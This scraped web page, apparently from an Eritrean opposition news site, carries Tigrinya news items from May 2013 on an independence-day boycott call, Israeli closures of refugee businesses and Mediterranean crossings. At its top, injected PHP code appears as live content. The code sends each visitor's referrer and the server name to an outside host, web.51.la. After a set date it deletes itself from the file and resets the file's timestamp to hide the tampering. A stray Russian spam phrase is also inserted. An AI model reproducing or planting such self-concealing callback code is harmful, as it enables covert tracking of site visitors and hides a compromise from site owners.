check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ህዝቢ ኤርትራ ብጉልባብ መዓልቲ ናጽነት ብህግደፍ ኣብ ዝዳሎ ዳንኬራን ጽንብልን ከይሳተፍ ፕሮጀክት ዓርቢ ሓርነት ኣተሓሳሲቡ።
кремлевская диета

ህዝቢ ኤርትራ ብጉልባብ መዓልቲ ናጽነት ብህግደፍ ኣብ ዝዳሎ ዳንኬራን ጽንብልን ከይሳተፍ ፕሮጀክት ዓርቢ ሓርነት ኣተሓሳሲቡ።

User Rating: / 7
PoorBest 

 

 

 

 

 

17/05/2013

ህዝቢ ኤርትራ ብጉልባብ መዓልቲ ናጽነት ብህግደፍ ኣብ ዝዳሎ ዳንኬራን ጽንብልን ከይሳተፍ ፕሮጀክት ዓርቢ ሓርነት ኣተሓሳሲቡ።

ንመበል 22 ዓመት ኣብ እነኽብሮ ዘለና መዓልቲ ናጽነት ሃገርና ብጉልባብ እታ መዓልቲ ብህግደፍ ኣብ ዝዳሎ ጓይላን ዳንኬራን ህዝቢ ኤርትራ ከይሳተፍን ኣብያኡ ከስምዕን ፕሮጀክት ዓርቢ ሓርነት ብምኽንያት 24 ግንቦት ኣብ ዘውጽኦ መግለጺ ጸዊዑሎ።

ኣሽሓት ቐያሕትን ጸለምትን ከፊልና ዘምጻእናያ ናጽነት ሎሚ ኢሳይያስን ጉጅሉኡን ቆርሚሞም ሽም ጥራሕ ኣትሪፎማ ኣለው ዝበለ እቲ ፕሮጀክት ከም ውጽኢት ናይዚ ድማ ኤርትራ እሱራት ብዘይ ፍርዲ ዝሳቐዩላ ህዝባ ክብረትን ሓርነትን ተነፊግዎ ናብ ስደት ዝበታተነላን ሃገራዊ ረብሓ ከተውሕስሉ ኣብ ዘይትኽእልን ኣሰካፊ መድረኽ ትርከብ ከምዘላ ኣስሚሩሉዩ።

ኣብ ውሽጢ ሃገር ዝርከብ ህዝብና ኣብዚ ናይ ህግደፍ ጽንብል ካብ ምስታፍ ተቆጢቡ ኣብ ገዝኡ ምስ ቤተሰቡ ክጽንብሎ ድማ ተማሕጺኑሎ።

ብጀካ ኣብ ወጻኢ ዝርከቡ ኤርትራውያን ደለይቲ ለውጢውን 24 ግንቦት በብዘለውዎ ተወዲቦም ዓለምለኻዊ ሰልፊ ብምግባር ከብዕልዎ ተዳልዮም ከምዘለው ሓቢሩዩ።

------------------------------------------///////////--------------------------------

17/05/2013

ምምሕዳር ከተማ ቴልኣቪቭ ንኣሽቱ ትካላት ኤርትራውያን

ብምዕጻው ንብረቶም ይዘምት ከም ዘሎ ተሓቢሩ።

ሬድዮ ኤረና ንማዕኸን ዜና ሃርትስ ጠቒሳ ከምዝጸብጸበቶ ምምሕዳር ከተማ ቴልኣቪቭ ብኤርትራውያንን ሱዳናውያንን ዝውነን ንኣሽቱ ትካላት  ብምዕጻው ንብረቶም ይዘምት ኣሎ።

ፖሊስ ምምሕዳር ከተማ ቴልኣቪቭ ኣብ ከባቢ ኔቭሻን ንዝርከባ ብኤርትራውያንን ሱዳናውያንን ዝውነና ኣስታት 10 ንኣሽቱ ትካላት ብምዕጻው ካብ ተጣበቕቲ ሰብኣዊ መሰላት እታ ሃገር ተቓውሞ ገጢምዎሎ።

መንግስቲ እስራኤል ንስደተኛታት ዝኾነ ዓይነት ሓገዝ ዘይገብር ክነሱ ነቲ ባዕሎም ዘቆሙዎ ትካላት ዓጽዩ ናይ መነባብሮ ጸቕጢ ዝፈጥር ዘሎ ነናብ ዓዶም ክኸዱ ንምግዳድ ከምዝኾነ’ውን እቲ ትካል ወቒሱ’ዩ።

መንግስቲ እስራኤል ኣብታ ሃገር ንዝርከቡ ኤርትራውያን ስደተኛታት ኣብ ዝኾነ ስራሕ ከይዋፈሩ ኣብ ርእሲ ምኽልካሉ ንዓዓቶም ዘስርሐ እስራኤላዊ’ውን ከቢድ መቕጻዕቲ ከምዝብየነሉ ኣፍሊጡ’ሎ።

ኣብ እስራኤል ብኤርትራውያንን ሱዳናውያንን ስደተኛታት ዝውነና 150 ትካላት ከምዘለዋ ሬድዮ ኤረና ወሲኻ ሓቢራ።

--------------------------------------/////////////----------------------------------

17/05/2013

ብማእከላይ ባሕሪ ናይ ዝሰግሩ ኤርትራውያን

ቁጽሪ ይውስኽ ከምዘሎ ተፈሊጡ።

ኣብዘን ዝሓለፋ ወርሒ መጋቢትን ሚያዝያን ጥራይ ስደተኛታት ዝጸዓና 24 ጀላቡ ካብ ገማግም ባሕሪ ሊብያ ከምእተበገሳ ብኣብነት ብምጥቃስ ብማእኸላይ ባሕሪ ናይ ዝሰግሩ ኤርትራውያን ኣሃዝ ኣዝዩ ከምዝወሰኸ ላዕለዋይ ኮሚሽን ስደተኛታት ሕቡራት ሃገራት ካብ ትሪፖሊ ኣብ ዘቃልሖ ጸብጻብ ገሊጹ።

ካብተን ገማግም ባሕሪ ዝተበገሳ 24 ጀላቡ እተን 19 ናብ ኢጣልያ እታ ሓንቲ ድማ ናብ ማልታ ክኣትዋ እንከለዋ እተን ኣርባዕተ ግና ብሓይሊ ባሕሪ ሊብያ ከምእተመልሳ ዝሓበረ እቲ ጸብጻብ ዝበዝሑ እቶም ስደተኛታት ኤርትራውያን ምዃኖም ድማ የነጽር።

ኣብ 19 ሚያዝያ 32 ትሕቲ ዕድመ ቆልዑን 18 ደቂ ኣንስትዮን ዝርከብዎም 84 ስደተኛታት ዝጸዓነት ጀልባ ኣብ ባሕሪ ናይ ምጥሓል ሓደጋ ምስኣንጸላለዋ ብምትሕብባር ሓይሊ ባሕሪ ማልታ ‘ቶም ስደተኛታት ንስክላ ከምዝድሓኑ እቲ ጸብጻብ ወሲኹ ሓቢሩ።

-----------------------------------/////////-----------------------------------------

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player